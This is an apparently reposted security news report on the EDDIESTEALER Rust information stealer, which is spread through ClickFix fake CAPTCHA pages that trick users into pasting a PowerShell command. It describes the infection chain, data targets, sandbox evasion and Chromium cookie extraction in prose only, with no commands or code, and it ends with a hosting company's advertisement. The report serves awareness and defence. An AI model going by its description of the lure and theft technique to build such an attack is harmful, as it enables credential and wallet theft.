A new malware campaign has been identified, distributing a sophisticated Rust-based information stealer named EDDIESTEALER. This malware takes advantage of the ClickFix social engineering tactic, which involves tricking users into interacting with fake CAPTCHA verification pages.

The campaign initiates when attackers compromise legitimate websites and inject malicious JavaScript that displays deceptive CAPTCHA checks. Users are prompted to validate their identity by executing a PowerShell script that installs the EDDIESTEALER malware, enabling it to collect sensitive information including credentials, browser data, and cryptocurrency wallet details.

Once the attack begins, it guides potential victims through a three-step process. First, they are instructed to open the Windows Run dialog, paste a command into it, and press enter. This leads to the execution of a PowerShell command that downloads a secondary payload from an external server. The malicious JavaScript file is saved to the victim’s Downloads folder and executed, ultimately fetching the EDDIESTEALER binary disguised with a random file name.

EDDIESTEALER functions as a commodity stealer, capable of harvesting metadata from systems, receiving commands from a command-and-control (C2) server, and extracting valuable user information from infected devices. It aims for various targets, including browser profiles, FTP clients, password managers, and messaging applications. The malware employs advanced techniques for data exfiltration, including encryption and custom WinAPI calls to interact with system files.

In a similar vein to other malware, EDDIESTEALER incorporates methods for self-defense, such as checking its execution environment to avoid detection and potentially deleting itself if it recognizes sandboxed settings. It also has the capability to bypass app-bound encryption in Chromium browsers to access unencrypted data like cookies, utilizing a Rust version of the open-source tool ChromeKatz for this purpose.

A noteworthy aspect of EDDIESTEALER is its ability to spawn a new browser instance in a hidden manner. If the targeted browser isn’t running, it can open it off-screen to facilitate memory extraction of sensitive credentials without the user’s knowledge.

Recent improvements to the malware have introduced features for broader data collection, such as acquiring system performance details and automatically sending host data to its C2 server before any commands are received. A hardcoded encryption key for client-server communication enhances its safeguard against detection.

This emerging malware trend parallels broader campaigns exploiting ClickFix techniques across multiple platforms, with threat actors employing a variety of methods to extract and exfiltrate user data from both macOS and mobile devices. The increasing sophistication of these attacks underlines the ongoing challenge cybersecurity professionals face in combating evolving threats in the digital landscape.

Welcome to DediRock, your trusted partner in high-performance hosting solutions. At DediRock, we specialize in providing dedicated servers, VPS hosting, and cloud services tailored to meet the unique needs of businesses and individuals alike. Our mission is to deliver reliable, scalable, and secure hosting solutions that empower our clients to achieve their digital goals. With a commitment to exceptional customer support, cutting-edge technology, and robust infrastructure, DediRock stands out as a leader in the hosting industry. Join us and experience the difference that dedicated service and unwavering reliability can make for your online presence. Launch our website.